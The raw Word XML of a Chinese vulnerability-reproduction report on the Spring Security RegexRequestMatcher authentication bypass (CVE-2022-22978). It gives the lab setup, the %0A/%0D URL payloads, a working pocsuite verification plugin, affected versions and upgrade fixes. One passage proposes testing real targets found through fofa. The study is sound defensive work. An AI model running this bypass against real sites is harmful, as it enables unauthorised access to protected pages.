            <w:tcW w:w="4376" w:type="dxa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使用SpringBoot框架搭建javaweb网页，其中在pom.xml文件中导入spring security的依赖，并手动设置spring security的版本为5.6.3（从而漏洞复现能够成功），完成基础网页的搭建（也可以使用vulhub靶场进行搭建）；安装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pocsuite2.0.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>，</w:t>
            </w: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使用pocsuite.py运行所编写的poc插件，完成poc的验证。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343" w:type="dxa"/>
            <w:vAlign w:val="center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漏洞复现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa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基于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RegexRequestMatcher</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>对正则表达式中的“.”过滤不严从而构造恶意的输入，最终绕过spring security的认证机制。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343" w:type="dxa"/>
            <w:vAlign w:val="center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hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman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POC编写</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437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firstLine="480" w:firstLineChars="20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按照漏洞复现的流程，结合抓包结果和POC框架，编写</w:t>
            </w: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POC</w:t>
            </w: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代码，实现自动漏洞测试验证。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343" w:type="dxa"/>
            <w:vAlign w:val="center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平台提交</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa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登录 360 POC++平台，</w:t>
            </w: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根据规范</w:t>
            </w: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提交POC。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc1860"/>
      <w:bookmarkStart w:id="20" w:name="_Toc18669"/>
      <w:bookmarkStart w:id="21" w:name="_Toc29668"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4风险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="87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651"/>
        <w:gridCol w:w="5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03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编号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风险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="572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03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hint="eastAsia" w:eastAsia="宋体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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>当</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>在s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>pring</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>security使用RegexRequestMatcher进行权限配置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>时</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>，由于RegexRequestMatcher正则表达式配置权限的特性，正则表达式中包含“.”时，未经身份</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>攻击者可以通过构造恶意数据包绕过身份认证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="23" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="24" w:name="_Toc6133"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="48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（1）访问http://localhost:8080/admin，显示权限不足，无法访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center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3959860" cy="147891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2593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47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在url中拼接换行符（\n）或回车符（\r），它们的url编码分别为%0A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和%0D，成功绕过认证机制，访问到admin界面。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357505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="357505" cy="213995"/>
                <wp:effectExtent l="6350" t="6350" r="7620" b="82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0825" y="3916680"/>
                          <a:ext cx="357505" cy="213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75pt;margin-top:28.15pt;height:16.85pt;width:28.15pt;z-index:251659264;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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LAcXDWAAAACQEAAA8AAAAAAAAAAQAgAAAAIgAAAGRy&#10;cy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kDNdLIbeQIAANYEAAAOAAAAAAAAAAEAIAAAACUB&#10;AABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAAAQBgAAAAA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959860" cy="1133475"/>
            <wp:effectExtent l="9525" t="9525" r="1206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389255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="321310" cy="238125"/>
                <wp:effectExtent l="6350" t="6350" r="1524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080" y="5137150"/>
                          <a:ext cx="32131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4pt;margin-top:30.65pt;height:18.75pt;width:25.3pt;z-index:251660288;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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/zeGLXAAAACQEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9k&#10;b3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kBl/CVDdQIAANYEAAAOAAAAAAAAAAEAIAAAACYBAABk&#10;cnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAAANBgAAAAA=&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1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959860" cy="1199515"/>
            <wp:effectExtent l="9525" t="9525" r="1206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t="3889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199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before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc18532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1 风险管理及规避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（1）规定在测试时只能访问到未授权的资源界面，不能对数据进行篡改，更不能侵害用户的隐私信息。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（2）对相关的未授权访问的资源数据进行安全备份，以应对任何可能的安全危害。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（3）在本地的服务器进行测试，不要对线上的网站进行测试，避免危害到服务器的正常运营，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc23034"/>
      <w:bookmarkStart w:id="27" w:name="_Toc10352"/>
      <w:bookmarkStart w:id="28" w:name="_Toc4033"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="42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先在本地搭建环境编写POC，再利用POC对真实测试用例进行测试，这里的测试用例可以是根据应用指纹在fofa平台或360网络空间安全测绘平台上寻找的测试目标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc28030"/>
      <w:bookmarkStart w:id="30" w:name="_Toc10303"/>
      <w:bookmarkStart w:id="31" w:name="_Toc28445"/>
      <w:bookmarkStart w:id="32" w:name="_Toc75461104"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试中所用的工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JDK8，SpringBoot2.1.6，Spring Security5.6.3，firefox-latest，pocsuite2.0.8，python2.7，</w:t>
      </w:r>
      <w:r>
        <w:t>burpsuite professional v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2023.5.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="34" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="35" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="36" w:name="_Toc12892"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc32666"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.1 POC插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/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#!/usr/bin/env python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 -*- coding: utf-8 -*-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from pocsuite.api.request import req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from pocsuite.api.poc import register,Output, POCBase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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rom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pocsuite.thirdparty.guanxing import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parse_ip_port,http_packet,make_verify_url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80" w:firstLineChars="20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class TestPOC(POCBase):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vulID = 'DSO-08749'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cveID = 'CVE-2022-22978'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cnvdID = ''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cnnvdID = ''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version = '1'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author = 'ZhongYuzhe'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vulDate = '2022-05-16'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createDate = '2023-07-19'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updateDate = '2023-07-19'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name = 'Spring Security Authentication Bypass POC'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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>esc='https://spring.io/security/cve-2022-22978'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solution = ''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severity = 'high'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vulType = 'Authentication bypass'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taskType = ''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references = [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'https://spring.io/security/cve-2022-22978',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'https://tanzu.vmware.com/security/cve-2022-22978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]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appName = 'Spring Security'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appVersion = '5.5.0 &lt;= Spring Security &lt; 5.5.7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\n5.6.0 &lt;= Spring Security &lt; 5.6.4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\nSpring Security &lt; 5.5.0'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appPowerLink = 'https://www.vmware.com/'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samples = ['']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install_requires = ['']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def _attack(self):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return self._verify()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def _verify(self):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self.url,ip,port = parse_ip_port(self.target, 80)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result = {}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headers =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'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'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payloads = ['/%0A', '/%0D', '/%0a', '/%0d']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for payload in payloads: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vul_url = make_verify_url(self.url, payload, mod=1)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resp = req.get(vul_url, headers = headers, verify = False, allow_redirects = False, timeout = 10)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if resp.status_code == 200 and 'Access Denied' not in resp.content: #表示成功访问资源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result['VerifyInfo'] = http_packet(resp)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result['VerifyInfo']['URL'] = vul_url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result['VerifyInfo']['port'] = port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return self.parse_output(result)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def parse_output(self, result):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output = Output(self)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if result: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output.success(result)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else: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output.fail('Failed')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return output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register(TestPOC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc25120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.2 漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="922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559"/>
        <w:gridCol w:w="1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="1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4"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAns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>UVD-ID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4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DSO-08749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漏洞类别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4"/>
              <w:spacing w:line="480" w:lineRule="auto"/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登录绕过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CVE-ID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line="48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CVE-2022-22978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4"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>披露/发现时间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4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2022-05-16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bugtraq编号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4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CNNVD-ID：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line="480" w:lineRule="auto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未分配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4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提交时间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4"/>
              <w:spacing w:line="480" w:lineRule="auto"/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3</w:t>
            </w:r>
            <w:r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-0</w:t>
            </w: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7</w:t>
            </w:r>
            <w:r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-</w:t>
            </w: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20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漏洞发现者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4"/>
              <w:spacing w:line="480" w:lineRule="auto"/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Spring官方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CNVD-ID：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line="480" w:lineRule="auto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未分配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4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漏洞等级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4"/>
              <w:spacing w:line="480" w:lineRule="auto"/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高危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提交者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4"/>
              <w:spacing w:line="480" w:lineRule="auto"/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钟雨哲/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default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1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>王伯雅</w:t>
            </w:r>
            <w:bookmarkStart w:id="39" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="39"/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搜索关键词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spacing w:line="48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Spring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4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4"/>
              <w:spacing w:line="480" w:lineRule="auto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5.5.0 &lt;= Spring Security &lt; 5.5.7</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:spacing w:line="480" w:lineRule="auto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5.6.0 &lt;= Spring Security &lt; 5.6.4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:spacing w:line="48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Spring Security &lt; 5.5.0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4"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang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>来源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4"/>
              <w:spacing w:line="48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https://spring.io/security/cve-2022-22978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4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4"/>
              <w:spacing w:line="48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Spring Security RegexRequestMatcher 认证绕过漏洞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4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漏洞详情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4"/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当在spring security使用RegexRequestMatcher进行权限配置时，由于RegexRequestMatcher正则表达式配置权限的特性，正则表达式中包含“.”时，未经身份认证攻击者可以通过构造恶意数据包绕过身份认证。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14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参考链接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4"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both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fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://spring.io/security/cve-2022-22978" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="11"/>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>https://spring.io/security/cve-2022-22978</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both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</w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://tanzu.vmware.com/security/cve-2022-22978" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="12"/>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>https://tanzu.vmware.com/security/cve-2022-22978</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roma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靶场信息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8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可以使用SpringBoot框架配置Spring Security依赖搭建JavaWeb靶场</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="48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可以使用vulhub配合docker搭建靶场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8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参照“4.1POC插件编写”部分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修复方案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Spring Security 5.5.x 升级至 5.5.7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Spring Security 5.6.x 升级至 5.6.4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="48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或者升级至最新版本6.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p/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28"/>
        <w:szCs w:val="28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P56+UsAgAAVw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g/nr5S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等线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黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300">
          <wp:extent cx="899160" cy="359410"/>
          <wp:effectExtent l="0" t="0" r="5715" b="254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C4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA5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0MTdmYTY2NGExYmRlNmIzN2E1ZTEyZDIxYTNmMDYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="67167EFB"/>
    <w:rsid w:val="2AFA28CA"/>
    <w:rsid w:val="39657AA9"/>
    <w:rsid w:val="47397193"/>
    <w:rsid w:val="4FA91D09"/>
    <w:rsid w:val="51E06D76"/>
    <w:rsid w:val="52DC6BD6"/>
    <w:rsid w:val="5E43512E"/>
    <w:rsid w:val="5ECF7456"/>
    <w:rsid w:val="64C53862"/>
    <w:rsid w:val="67167EFB"/>
    <w:rsid w:val="741B2C62"/>
    <w:rsid w:val="76604EDF"/>
    <w:rsid w:val="7706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100" w:beforeLines="100" w:after="100" w:afterLines="100" w:line="400" w:lineRule="exact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9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50" w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr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 2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLine="480" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="00000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39"/>
    <w:rPr>
      <w:b/>
    </w:rPr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paragraph" w:styleId="13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14">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"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2023-07-19T23:57:00Z</dcterms:created>
  <dc:creator>抉择者</dc:creator>
  <cp:lastModifiedBy>微信用户</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-21T01:46:10Z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7D1CF9D714F04398BB460E38C3BFC837_13</vt:lpwstr>
  </property>
</Properties>
</file>